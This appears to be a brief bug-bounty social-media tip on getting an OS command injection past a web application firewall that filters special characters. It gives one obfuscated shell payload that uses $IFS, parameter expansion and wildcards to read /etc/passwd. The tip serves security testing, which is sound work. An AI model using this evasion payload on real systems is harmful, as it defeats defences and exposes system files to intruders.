protip:
if you found OS command Injection vulnerability but there’s a WAF that blocks payloads with special characters like (/”‘&|()-;:.,`) so its still possible to bypass it.
E.g: /etc/passwd File :
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
#bugbountytips
Cr : Aysar Harb https://t.co/nlqKpuvZ7Z